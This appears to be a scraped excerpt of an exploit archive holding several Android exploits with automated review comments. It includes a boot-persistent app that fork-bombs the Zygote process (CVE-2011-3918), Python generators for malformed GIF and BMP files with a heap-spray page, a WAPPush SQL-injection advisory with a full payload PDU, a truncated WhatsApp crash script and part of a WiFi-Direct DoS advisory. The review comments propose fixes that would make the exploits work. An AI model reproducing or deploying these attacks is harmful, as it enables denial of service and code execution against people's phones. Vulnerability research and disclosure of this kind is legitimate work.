ZygoteVulnerability is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*/
package it.ailab;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class BootReceiver extends BroadcastReceiver{
@Override
public void onReceive(Context context, Intent intent) {
Log.d("BOOT","boot completed. starting service");
Intent intentReceiver = new Intent();
intentReceiver.setAction("it.ailab.ServiceDOS");
context.startService(intentReceiver);
}
}
################# ServiceDOS.java ##################
/**
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
* Copyright 2012 Luca Verderame
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ZygoteVulnerability is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*/
package it.ailab;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.PrintWriter;
import android.app.Service;
import android.content.Intent;
import android.net.LocalSocket;
import android.net.LocalSocketAddress;
import android.os.HandlerThread;
import android.os.IBinder;
import android.util.Log;
public class ServiceDOS extends Service{
SocketUtil socketUtil = null;
public boolean connectToZygoteIfNeeded(){
int retry = 0;
while(((socketUtil == null) || (socketUtil.sZygoteSocket == null)) && retry < 20)
{
Log.d("SERV", "connection to socket needed");
socketUtil = null;
if (retry > 0) {
try {
Log.d("SERV", "Zygote not up yet, sleeping...");
Thread.sleep(500);
} catch (InterruptedException ex) {
// should never happen
}
}
//loading part..
LocalSocket client = new LocalSocket();
try {
client.connect(new LocalSocketAddress("zygote",LocalSocketAddress.Namespace.RESERVED));
} catch (IOException e1) {
// TODO Auto-generated catch block
Log.e("SERV","link client error");
e1.printStackTrace();
}
if(client != null)
{
DataInputStream in = null;
try {
in = new DataInputStream(client.getInputStream());
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
PrintWriter p = null;
try {
p = new PrintWriter(client.getOutputStream());
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
BufferedWriter out = new BufferedWriter(p);
socketUtil = new SocketUtil(client,in,out);
Log.d("SERV", "socket connection completed");
}
retry++;
} //fine while
if(socketUtil != null)
{
if(retry > 0)
Log.d("SERV", "socket connection completed");
return true;
}
return false;
}
@Override
public void onCreate() {
// Start up the thread running the service. Note that we create a
// separate thread because the service normally runs in the process's
// main thread, which we don't want to block. We also make it
// background priority so CPU-intensive work will not disrupt our UI.
HandlerThread thread = new HandlerThread("ServiceDOS");
thread.start();
connectToZygoteIfNeeded();
}
@Override
public IBinder onBind(Intent intent) {
// TODO Auto-generated method stub
onStartCommand(intent,0,0);
return null;
}
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
Log.d("SERV","onStart");
final int uid = 123456;
final int gid = 123456;
final int[] gids = {};
String[] extraArgs = null; //altrimenti null
String className = "com.android.internal.util.WithFramework";
//String className = "android.app.ActivityThread";
int res = 0;
int tr = 0;
while(tr<10000)
{
//String niceName = "DummyProcess" + tr;
connectToZygoteIfNeeded();
try {
res = socketUtil.startViaZygote(className,null,uid,gid,gids,0,extraArgs);
} catch (Exception e) {
// TODO Auto-generated catch block
Log.e("SERV", "starting error");
e.printStackTrace();
}
//Log.d("SERV", "risultato startViaZygote: " + res);
Log.d("SERV", "started process #:" +tr);
tr++;
}//fine while
//if whe return here -> restart!
return START_STICKY;
}
@Override
public void onDestroy (){
socketUtil.clean();
socketUtil = null;
Log.d("SERV", "service destroyed! trying to restart...");
Intent intent = new Intent(this, ServiceDOS.class);
onStartCommand(intent,0,0);
}
}
################# SocketAndroidActivity.java ##################
/**
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
* Copyright 2012 Luca Verderame
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ZygoteVulnerability is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*/
package it.ailab;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
public class SocketAndroidActivity extends Activity {
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Log.d("APP","starting of the service");
Intent intent = new Intent(this, ServiceDOS.class);
startService(intent);
Log.d("APP","service activated");
this.finish();
}
}
################# SocketUtil.java ##################
/**
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
* Copyright 2012 Luca Verderame
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ZygoteVulnerability is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*/
package it.ailab;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.IOException;
import java.util.ArrayList;
import android.net.LocalSocket;
public class SocketUtil {
static LocalSocket sZygoteSocket = null;
static DataInputStream sZygoteInputStream = null;
static BufferedWriter sZygoteWriter = null;
/* versione unixDomainSocket
static UnixDomainSocketClient sZygoteSocket = null;
public SocketUtil(UnixDomainSocketClient c, DataInputStream i,BufferedWriter o)
{
sZygoteSocket = c;
sZygoteInputStream = i;
sZygoteWriter = o;
}
*/
public void clean()
{
try {
sZygoteSocket.close();
sZygoteInputStream.close();
sZygoteWriter.close();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
sZygoteSocket = null;
sZygoteWriter = null;
sZygoteInputStream = null;
}
public SocketUtil(LocalSocket c, DataInputStream i,BufferedWriter o)
{
sZygoteSocket = c;
sZygoteInputStream = i;
sZygoteWriter = o;
}
/*
* Starts a new process via the zygote mechanism.
Parameters:
processClass Class name whose static main() to run
niceName 'nice' process name to appear in ps
uid a POSIX uid that the new process should setuid() to
gid a POSIX gid that the new process shuold setgid() to
gids null-ok; a list of supplementary group IDs that the new process should setgroup() to.
enableDebugger True if debugging should be enabled for this process.
extraArgs Additional arguments to supply to the zygote process.
Returns:
PID
Throws:
Exception if process start failed for any reason
*/
public int startViaZygote(final String processClass,
final String niceName,
final int uid, final int gid,
final int[] gids,
int debugFlags,
String[] extraArgs)
throws Exception {
int pid;
synchronized(Process.class) {
ArrayList<String> argsForZygote = new ArrayList<String>();
// --runtime-init, --setuid=, --setgid=,
// and --setgroups= must go first
argsForZygote.add("--runtime-init");
// argsForZygote.add("--setuid=" + uid);
//argsForZygote.add("--setgid=" + gid);
//argsForZygote.add("--classpath=:data:data:socketAndroid");
//argsForZygote.add("data.data.android.socket.a.socket.DummyClass");
//opzioni da sistemare eventualmente dopo & Zygote.DEBUG_ENABLE_SAFEMODE, & Zygote.DEBUG_ENABLE_DEBUGGER
//& Zygote.DEBUG_ENABLE_CHECKJNI & Zygote.DEBUG_ENABLE_ASSERT
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-safemode");
}
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-debugger");
}
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-checkjni");
}
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-assert");
}
//TODO optionally enable debuger
//argsForZygote.add("--enable-debugger");
/*
// --setgroups is a comma-separated list
if (gids != null && gids.length > 0) {
StringBuilder sb = new StringBuilder();
sb.append("--setgroups=");
int sz = gids.length;
for (int i = 0; i < sz; i++) {
if (i != 0) {
sb.append(',');
}
sb.append(gids[i]);
}
argsForZygote.add(sb.toString());
}
*/
if (niceName != null) {
argsForZygote.add("--nice-name=" + niceName);
}
argsForZygote.add(processClass);
if (extraArgs != null) {
for (String arg : extraArgs) {
argsForZygote.add(arg);
}
}
pid = zygoteSendArgsAndGetPid(argsForZygote);
}
if (pid <= 0) {
throw new Exception("zygote start failed:" + pid);
}
return pid;
}
private static int zygoteSendArgsAndGetPid(ArrayList<String> args)
throws Exception {
int pid = 0;
//openZygoteSocketIfNeeded();
try {
/*See com.android.internal.os.ZygoteInit.readArgumentList()
Presently the wire format to the zygote process is:
a) a count of arguments (argc, in essence)
b) a number of newline-separated argument strings equal to count After the zygote process reads
these it will write the pid of the child or -1 on failure.
*/
sZygoteWriter.write(Integer.toString(args.size()));
sZygoteWriter.newLine();
int sz = args.size();
for (int i = 0; i < sz; i++) {
String arg = args.get(i);
if (arg.indexOf('\n') >= 0) {
throw new Exception(
"embedded newlines not allowed");
}
sZygoteWriter.write(arg);
sZygoteWriter.newLine();
}
sZygoteWriter.flush();
// Should there be a timeout on this?
pid = sZygoteInputStream.readInt();
if (pid < 0) {
throw new Exception("fork() failed");
}
} catch (IOException ex) {
if (sZygoteSocket != null) {
sZygoteSocket.close();
/*
} catch (IOException ex2) {
// we're going to fail anyway
Log.e("app","I/O exception on routine close", ex2);
}
*/
sZygoteSocket = null;
throw new Exception(ex);
}
}
return pid;
}
}
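Review bot: in `SocketUtil.startViaZygote` the four guards `if ((debugFlags ) != 0)` all test the same expression, so any nonzero `debugFlags` adds `--enable-safemode`, `--enable-debugger`, `--enable-checkjni` and `--enable-assert` together; the `& Zygote.DEBUG_ENABLE_*` masks named in the comment above them are what each check should AND against, and as written the parameter is effectively boolean. In `ServiceDOS.connectToZygoteIfNeeded`, `client` is a freshly constructed `LocalSocket`, so `if(client != null)` after the `connect` catch block is always true: a failed connect only prints, the `getInputStream`/`getOutputStream` failures only print and leave `in` and `p` null, and the code still goes on to `new BufferedWriter(p)` and `new SocketUtil(client,in,out)`, which satisfies the `while` condition and ends the retry loop with unusable streams; the failure paths should null out `client` or `continue` the retry. Also, `onCreate` starts a `HandlerThread` named "ServiceDOS" that nothing posts to, while the 10000-iteration loop in `onStartCommand` runs on the calling thread, contradicting the comment that explains why a separate thread is created; and `uid`/`gid` of 123456 are declared but the `--setuid=`/`--setgid=` lines are commented out, so those fields are dead. Documentation: the headers cite CVE-2011-3918 and the ai-lab URL but give no affected or fixed Android version.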

32
exploits/android/dos/31307.py Executable file

@ -0,0 +1,32 @@
source: https://www.securityfocus.com/bid/28005/info
Android Web Browser is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
Successfully exploiting this vulnerability can allow remote attackers to execute arbitrary machine code in the context of the application. Failed attempts will likely result in denial-of-service conditions.
This issue affects Android SDK m3-rc37a and earlier.
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
#Save the _bad_ gif image
q=open(imagename,'wb=""')
q.write(img)
q.close()
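Review bot: `q=open(imagename,'wb=""')` passes an invalid mode string; the `=""` looks like HTML-attribute residue from wherever the file was scraped, and the intended mode is `'wb'`, matching the `'rb'` read two lines earlier (Python 3 raises `ValueError` for it, and the Python 2 outcome depends on how tolerant the C library is of trailing mode characters). The file is otherwise Python 2 code: `str = '\x00\x00\x00\x00'*30000` shadows the builtin and is a text string, and `import Image` is the old standalone PIL module name, which under Pillow is `from PIL import Image`. The header should also say what the sample actually is: a valid GIF of a 120000x1 'L' image whose logical-screen width/height fields (bytes 6-9, overwritten by `struct.pack('<HH',SWidth,SHeight)`) are shrunk to 1x1, since that mismatch is the whole point and `#Shrink the Logical screen dimension` is the only hint.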


@ -0,0 +1,58 @@
source: https://www.securityfocus.com/bid/28006/info
Android Web Browser is prone to an integer-overflow vulnerability because it fails to adequately handle user-supplied data.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.
This issue affects Android SDK m5-rc14 and earlier.
# This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
# Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
# Alfredo Ortega - Core Security
import struct
offset = 0xffef0000
width = 0x0bffff
height=8
bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00"
bmp+=struct.pack("<I",offset)
bmp+="\x28\x00\x00\x00"
bmp+=struct.pack("<I",width)
bmp+=struct.pack("<I",height)
bmp+="\x03\x00\x08\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff"
bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41"
bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
open("badbmp.bmp","wb").write(bmp)
The complete exploit page follows:
<HTML>
<HEAD>
</HEAD>
<BODY>
<script type="text/javascript">
// Fill 0x200000 - 0xa00000 with Breakpoints
var nop = unescape("%u0001%uef9f");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<5;i++)
document.write(nop)
// Fill 0xa00000 - 0x1100000 with address 0x00400040
var nop = unescape("%u4000%u4000");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<2;i++)
document.write(nop)
</script>
<IMG src=badbmp.bmp>
</BODY>
</HTML>
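Review bot: as captured, the file cannot be parsed as Python: the header comment wraps onto continuation lines with no `#` prefix (`jump to the address at 0xffffff+0x10` and `src=badbmp.bmp>`), and the prose line `The complete exploit page follows:` plus the HTML document after `open("badbmp.bmp","wb").write(bmp)` sit in the same file as plain text. The .py should hold only the generator with the wrapped comment lines re-joined, and the HTML should be a separate `.html` file next to `badbmp.bmp`, which is where `<IMG src=badbmp.bmp>` expects it. Also worth documenting in the header which BMP field each value lands in: `offset` (0xffef0000) is packed into the pixel-data offset field and `width` (0x0bffff) into the DIB width, since the description only says "integer-overflow" and the reader has to decode the raw header bytes to see where.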


@ -0,0 +1,143 @@
INTRODUCTION
==================================
In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check)
DETAILS
==================================
When a WAPPush message is received, the raw pdu is processed by dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java
Here the pdu is parsed to get the contentType & wapAppId:
String mimeType = pduDecoder.getValueString();
...
/**
* Seek for application ID field in WSP header.
* If application ID is found, WapPushManager substitute the message
* processing. Since WapPushManager is optional module, if WapPushManager
* is not found, legacy message processing will be continued.
*/
if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
index = (int) pduDecoder.getValue32();
pduDecoder.decodeXWapApplicationId(index);
String wapAppId = pduDecoder.getValueString();
if (wapAppId == null) {
wapAppId = Integer.toString((int) pduDecoder.getValue32());
}
String contentType = ((mimeType == null) ?
Long.toString(binaryContentType) : mimeType);
if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);
The wapAppId & contentType can be literal string embeded in the pdu, to prove this, we can launch Android 4.4 emulator and send sms pdu by telnet console
Type the following command in telnet console:
sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001
And watch the radio logcat message in emulator, it prints out the extracted malicious appid:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
However, since the WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!"
But if the WAPPushManager is installed, the extracted wapAppId & contentType will be send to its method processMessage:
try {
boolean processFurther = true;
IWapPushManager wapPushMan = mWapPushManager;
if (wapPushMan == null) {
if (DBG) Rlog.w(TAG, "wap push manager not found!");
} else {
Intent intent = new Intent();
intent.putExtra("transactionId", transactionId);
intent.putExtra("pduType", pduType);
intent.putExtra("header", header);
intent.putExtra("data", intentData);
intent.putExtra("contentTypeParameters",
pduDecoder.getContentParameters());
int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);
So we go on checking the source code of WAPPushManager:
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/
In the method processMessage, the app_id and content_type is used in the method queryLastApp:
public int processMessage(String app_id, String content_type, Intent intent)
throws RemoteException {
Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
WapPushManDBHelper dbh = getDatabase(mContext);
SQLiteDatabase db = dbh.getReadableDatabase();
WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
db.close();
Then in the method queryLastApp, both app_id and content_type is concatenated without any escaping to build the rawQuery sql input,
protected queryData queryLastApp(SQLiteDatabase db,
String app_id, String content_type) {
String sql = "select install_order, package_name, class_name, "
+ " app_type, need_signature, further_processing"
+ " from " + APPID_TABLE_NAME
+ " where x_wap_application=\'" + app_id + "\'"
+ " and content_type=\'" + content_type + "\'"
+ " order by install_order desc";
if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
Cursor cur = db.rawQuery(sql, null);
Obviously, this is a SQL injection, for example, if app_id is as follows:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
Then the package_name & class_name of query result would be:
"com.android.settings" and "com.android.settings.Setttings"
OK, then we return back to the method processMessage of WAPPushManager
The appType, packageName, className is fully controllable, which will be used to set the component of an intent to start a activity or service
That means, attacker can remotely launch any activity or service by construct malformed WAPPush Message (need permission check)
if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
//Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(lastapp.packageName, lastapp.className);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
try {
mContext.startActivity(intent);
} catch (ActivityNotFoundException e) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
} else {
intent.setClassName(mContext, lastapp.className);
intent.setComponent(new ComponentName(lastapp.packageName,
lastapp.className));
if (mContext.startService(intent) == null) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
}
This has been fixed in android 5.0 (android bug id 17969135)
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6
TIMELINE
==================================
11.10.2014 Initial report to Android Security Team with the POC
14.10.2014 Reply from Android Security Team "are looking into it"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
09.11.2014 Contact MITRE about this issue
17.11.2014 CVE-2014-8507 assigned
26.11.2014 Public Disclosure
IDENTIFIERS
==================================
CVE-2014-8507
Android id 17969135
CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team
--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=167
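Review bot: the vulnerable `queryLastApp` concatenates `app_id` and `content_type` into the SQL text and then calls `db.rawQuery(sql, null)`, leaving the `selectionArgs` parameter, which exists precisely to bind untrusted values, unused; the correct form is `where x_wap_application=? and content_type=?` with `new String[]{app_id, content_type}` passed as the second argument, the same API already in use. The advisory links the AOSP fix commit (48ed8354...) but does not summarize what it changed, so a one-line summary would save readers opening it. Typo in the query-result line: "com.android.settings.Setttings" should read "com.android.settings.Settings", as in the injected string above it. The phrase "(need permission check)" appears twice without saying which check is meant; the text should state what permission constraint applies to the component started by WAPPushManager so the impact statement is precise.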

107
exploits/android/dos/35637.py Executable file

@ -0,0 +1,107 @@
# Mirror: http://pastebin.com/raw.php?i=CZChGAnG
# Video: https://www.youtube.com/watch?v=V7bnLOohqqI
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
# #RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
# Daniel Godoy @0xhielasangre <danielgodoy@gobiernofederal.com>
# Credits:
# Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
# or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config"
def getCredentials(config = DEFAULT_CONFIG):
if os.path.isfile(config):
f = open(config)
phone = ""
idx = ""
pw = ""
cc = ""
try:
for l in f:
line = l.strip()
if len(line) and line[0] not in ('#',';'):
prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
varname = prep[0].strip()
val = prep[1].strip()
if varname == "phone":
phone = val
elif varname == "id":
idx = val
elif varname =="password":
pw =val
elif varname == "cc":
cc = val
return (cc, phone, idx, pw);
except:
pass
return 0
def main(phone):
credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
if credentials:
countryCode, login, identity, password = credentials
identity = Utilities.processIdentity(identity)
password = base64.b64decode(password)
# Custom message that will crash WhatsApp
message = message = "#RemoteExecution
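Review bot: the shebang `#!/usr/bin/python` sits on the third line, after the `# Mirror:` and `# Video:` comments, so it has no effect when the file is executed directly; it belongs on line 1. `DEFAULT_CONFIG` is assigned twice with the same value (before and after `COUNTRIES_CSV`), and `COUNTRIES_CSV` is never used. In `main`, `getCredentials(MINE_CONFIG or DEFAULT_CONFIG )` always evaluates to `"config"` because `MINE_CONFIG` is a non-empty string, so the `~/.yowsup/auth` fallback described in the configuration comment is unreachable; and `getCredentials` hides every parse error behind a bare `except: pass` and returns `0` instead of raising, which `main` then treats as "no credentials" with no message. The hunk header promises 107 lines but the captured text stops inside `message = message = "#RemoteExecution`, an unterminated string literal (and a doubled assignment), so the send logic is missing from this copy; the file should be re-imported from the listed mirror before it is accepted.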


@ -0,0 +1,438 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Android WiFi-Direct Denial of Service
1. *Advisory Information*
Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release
2. *Vulnerability Information*
Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997
3. *Vulnerability Description*
Some Android devices are affected by a Denial of Service attack when
scanning for WiFi Direct devices.
An attacker could send a specially crafted 802.11 Probe Response frame
causing the Dalvik subsystem to reboot because of an Unhandle Exception
on WiFiMonitor class.
4. *Vulnerable Packages*
. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2
Other devices could be also affected.
5. *Non-vulnerable packages*
. Android 5.0.1
. Android 5.0.2
6. *Vendor Information, Solutions and Workarounds*
Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
Contact vendor for further information.
7. *Credits*
This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
Team. The publication of this advisory was coordinated by the Core
Advisories
Team.
8. *Technical Description / Proof of Concept Code*
Android makes use of a modified *wpa_supplicant*[1]
in order to provide an interface between the wireless driver and the
Android platform framework.
Below the function that handles *wpa_supplicant* events. This function
returns a jstring from calling NewStringUTF method.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
-----/
The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
devices to exchange device information, the device name is part of
this information.
The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
represents a Wi-Fi p2p device. The constructor method receives the
string provided by
the *wpa_supplicant* and throws an IllegalArgumentException in case
the event is malformed.
Below partial content of the WiFiP2PDevice.java file.
/-----
[...]
    /** Detailed device string pattern with WFD info
     * Example:
     *  P2P-DEVICE-FOUND 00:18:6b:de:a3:6e p2p_dev_addr=00:18:6b:de:a3:6e
     *  pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E' config_methods=0x188
     *  dev_capab=0x21 group_capab=0x9
     */
    private static final Pattern detailedDevicePattern = Pattern.compile(
        "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
        "(\\d+ )?" +
        "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
        "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
        "name='(.*)' " +
        "config_methods=(0x[0-9a-fA-F]+) " +
        "dev_capab=(0x[0-9a-fA-F]+) " +
        "group_capab=(0x[0-9a-fA-F]+)" +
        "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
    );
[...]
    /**
     * @param string formats supported include
     *  P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13
     *  pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 dev_capab=0x27
     *  group_capab=0x0 wfd_dev_info=000006015d022a0032
     *
     *  P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
     *
     *  AP-STA-CONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
     *
     *  AP-STA-DISCONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
     *
     *  fa:7b:7a:42:02:13
     *
     * Note: The events formats can be looked up in the wpa_supplicant code
     * @hide
     */
    public WifiP2pDevice(String string) throws IllegalArgumentException {
        String[] tokens = string.split("[ \n]");
        Matcher match;

        if (tokens.length < 1) {
            throw new IllegalArgumentException("Malformed supplicant event");
        }

        switch (tokens.length) {
            case 1:
                /* Just a device address */
                deviceAddress = string;
                return;
            case 2:
                match = twoTokenPattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }
                deviceAddress = match.group(2);
                return;
            case 3:
